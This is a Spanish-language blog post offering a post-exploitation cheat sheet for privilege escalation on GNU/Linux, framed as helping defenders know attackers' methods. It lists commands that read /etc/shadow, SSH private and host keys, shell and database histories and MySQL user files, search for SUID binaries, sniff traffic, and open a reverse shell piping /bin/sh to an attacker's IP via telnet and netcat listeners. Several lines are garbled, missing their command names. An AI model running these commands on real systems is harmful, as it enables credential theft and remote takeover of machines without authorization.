Escalada de privilegios en GNU/Linux

A continuación os dejo una pequeña chuleta con todos aquellos comandos a ejecutar tras una correcta explotación de un sistema GNU/Linux.
Lógicamente esta irá creciendo en función de las necesidades, pero son los básicos para saber desde la IP del equipo, a qué usuarios eres en realidad dentro del mismo.
Una vez dentro de un equipo, todos los datos a los que tengamos acceso pueden suponer un riesgo de seguridad para el sistema e incluso para la red, así que ya sabes, la mejor manera de defender es saber por dónde te van a atacar.
  • Sistema Operativo
    • Tipo de distribución y sistema operativo
      shell> cat /etc/issue
      shell> cat /etc/*-release
      shell> cat /etc/lsb-release
      shell> cat /etc/redhat-release
      
    • Versión del kernel
      shell> cat /proc/version   
      shell> uname -a
      shell> uname -mrs 
      shell> rpm -q kernel 
      shell> dmesg | grep Linux
      shell> ls /boot | grep vmlinuz-
      
    • Variables de entorno
      shell> cat /etc/profile
      shell> cat /etc/bashrc
      shell> cat ~/.bash_profile
      shell> cat ~/.bashrc
      shell> cat ~/.bash_logout
      shell> env
      shell> set
      
  • Aplicaciones y servicios
    • Servicios en ejecución
      shell> ps aux
      shell> ps -ef
      shell> top
      shell> cat /etc/service 
      
    • Servicios ejecutados como root
      shell> ps aux | grep root
      shell> ps -ef | grep root
      
    • Aplicaciones instaladas
      shell> ls -alh /usr/bin/
      shell> ls -alh /sbin/
      shell> dpkg -l
      shell> rpm -qa
      shell> ls -alh /var/cache/apt/archivesO
      shell> ls -alh /var/cache/yum/
      
    • Configuraciones por defecto o plugins (vulnerables)
      shell> cat /etc/syslog.conf 
      shell> cat /etc/chttp.conf
      shell> cat /etc/lighttpd.conf
      shell> cat /etc/cups/cupsd.conf 
      shell> cat /etc/inetd.conf 
      shell> cat /etc/apache2/apache2.conf
      shell> cat /etc/my.conf
      shell> cat /etc/httpd/conf/httpd.conf
      shell> cat /opt/lampp/etc/httpd.conf
      shell> ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ 
      
    • Listado de trabajos programados
      shell> crontab -l
      shell> ls -alh /var/spool/cron
      shell> ls -al /etc/ | grep cron
      shell> ls -al /etc/cron*
      shell> cat /etc/cron*
      shell> cat /etc/at.allow
      shell> cat /etc/at.deny
      shell> cat /etc/cron.allow
      shell> cat /etc/cron.deny
      shell> cat /etc/crontab
      shell> cat /etc/anacrontab
      shell> cat /var/spool/cron/crontabs/root
      
  • Red
    • Tarjetas de red y conexiones configuradas
      shell> /sbin/ifconfig -a
      shell> cat /etc/network/interfaces
      shell> cat /etc/sysconfig/network 
      
    • Configuración de red
      shell> cat /etc/resolv.conf
      shell> cat /etc/sysconfig/network
      shell> cat /etc/networks
      shell> iptables -L
      shell> hostname
      shell> dnsdomainname
      
    • Conexiones establecidas con el equipo
      shell> lsof -i 
      shell> lsof -i :80
      shell> grep 80 /etc/services
      shell> netstat -antup
      shell> netstat -antpx
      shell> netstat -tulpn
      shell> chkconfig --list
      shell> chkconfig --list | grep 3:on
      shell> last
      shell> w
      shell> arp -e
      shell> route
      shell> /sbin/route -nee
      
    • Hay posibilidad de sniffar la red
      shell> tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
      
    • Arrancando una shell remota
      shell> nc -lvp 4444    # Attacker. Input (Commands)
      shell> nc -lvp 4445    # Attacker. Ouput (Results)
      shell> telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445
      
    • port forwarding
      shell> ssh -L 8080:127.0.0.1:80 root@192.168.1.7
      shell> ssh -R 8080:127.0.0.1:80 root@192.168.1.7
      
  • Información de usuarios
    • Quién eres y qué usuarios hay
      shell> id
      shell> who
      shell> w
      shell> last 
      shell> cat /etc/passwd | cut -d:    # List of users
      shell> grep -v -E "^#" /etc/passwd|awk -F: '$3 == 0 { print $1}'
      shell> awk -F: '($3 == "0") {print}' /etc/passwd
      shell> cat /etc/sudoers
      shell> sudo -l
      shell> cat ~/.bashrc
      shell> cat ~/.profile
      shell> cat /var/mail/root
      shell> cat /var/spool/mail/root
      
    • Acceso a ficheros sensibles
      shell> cat /etc/passwd
      shell> cat /etc/group
      shell> cat /etc/shadow
      shell> ls -alh /var/mail/
      
    • Cosas "de interés" en la home del equipo
      shell> ls -ahlR /root/
      shell> ls -ahlR /home/
      
    • Contraseñas, scripts, configuraciones, bases de datos, etc.
      shell> cat /var/apache2/config.inc
      shell> cat /var/lib/mysql/mysql/user.MYD 
      shell> cat /root/anaconda-ks.cfg
      
    • Últimos comandos ejecutados
      shell> cat ~/.bash_history
      shell> cat ~/.nano_history
      shell> cat ~/.atftp_history
      shell> cat ~/.mysql_history 
      shell> cat ~/.php_history
      
    • Claves privadas y públicas de ssh
      shell> cat ~/.ssh/authorized_keys
      shell> cat ~/.ssh/identity.pub
      shell> cat ~/.ssh/identity
      shell> cat ~/.ssh/id_rsa.pub
      shell> cat ~/.ssh/id_rsa
      shell> cat ~/.ssh/id_dsa.pub
      shell> cat ~/.ssh/id_dsa
      shell> cat /etc/ssh/ssh_config
      shell> cat /etc/ssh/sshd_config
      shell> cat /etc/ssh/ssh_host_dsa_key.pub
      shell> cat /etc/ssh/ssh_host_dsa_key
      shell> cat /etc/ssh/ssh_host_rsa_key.pub
      shell> cat /etc/ssh/ssh_host_rsa_key
      shell> cat /etc/ssh/ssh_host_key.pub
      shell> cat /etc/ssh/ssh_host_key
      
  • Sistema de ficheros
    • Montaje del sistema de ficheros
      shell> mount
      shell> df -h
      shell> cat /etc/fstab
      
    • Permisos avanzados
      shell> find / -perm -1000 -type d 2>/dev/null
      shell> find / -perm -g=s -type f 2>/dev/null
      shell> find / -perm -u=s -type f 2>/dev/null
      shell> find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
      shell> for i in `locate -r "bin$"`
      do
         find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null;
      done
      
    • Qué ficheros pueden ser editados en /etc
      shell> ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null
      shell>  -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null
      shell>  -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null
      shell>  -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null
      shell>  /etc/ -readable -type f 2>/dev/null
      shell>  /etc/ -readable -type f -maxdepth 1 2>/dev/null
      
    • Qué se puede sacar de /var
      shell> ls -alh /var/log
      shell> ls -alh /var/mail
      shell> ls -alh /var/spool
      shell> ls -alh /var/spool/lpd 
      shell> ls -alh /var/lib/pgsql
      shell> ls -alh /var/lib/mysql
      shell> cat /var/lib/dhcp3/dhclient.leases
      
    • Servidor web
      shell> ls -alhR /var/www/
      shell> ls -alhR /srv/www/htdocs/ 
      shell> ls -alhR /usr/local/www/apache22/data/
      shell> ls -alhR /opt/lampp/htdocs/ 
      shell> ls -alhR /var/www/html/
      
    • Cosas de interés en los ficheros de log
      shell> cat /etc/httpd/logs/access_log
      shell> cat /etc/httpd/logs/access.log
      shell> cat /etc/httpd/logs/error_log
      shell> cat /etc/httpd/logs/error.log
      shell> cat /var/log/apache2/access_log
      shell> cat /var/log/apache2/access.log
      shell> cat /var/log/apache2/error_log
      shell> cat /var/log/apache2/error.log
      shell> cat /var/log/apache/access_log
      shell> cat /var/log/apache/access.log
      shell> cat /var/log/auth.log
      shell> cat /var/log/chttp.log
      shell> cat /var/log/cups/error_log
      shell> cat /var/log/dpkg.log
      shell> cat /var/log/faillog
      shell> cat /var/log/httpd/access_log
      shell> cat /var/log/httpd/access.log
      shell> cat /var/log/httpd/error_log
      shell> cat /var/log/httpd/error.log
      shell> cat /var/log/lastlog
      shell> cat /var/log/lighttpd/access.log
      shell> cat /var/log/lighttpd/error.log
      shell> cat /var/log/lighttpd/lighttpd.access.log
      shell> cat /var/log/lighttpd/lighttpd.error.log
      shell> cat /var/log/messages
      shell> cat /var/log/secure
      shell> cat /var/log/syslog
      shell> cat /var/log/wtmp
      shell> cat /var/log/xferlog
      shell> cat /var/log/yum.log
      shell> cat /var/run/utmp
      shell> cat /var/webmin/miniserv.log
      shell> cat /var/www/logs/access_log
      shell> cat /var/www/logs/access.log
      shell> ls -alh /var/lib/dhcp3/
      shell> ls -alh /var/log/postgresql/
      shell> ls -alh /var/log/proftpd/
      shell> ls -alh /var/log/samba/
      


No hay comentarios :

Publicar un comentario

Formulario de contacto

Nombre

Correo electrónico *

Mensaje *

Últimos comentarios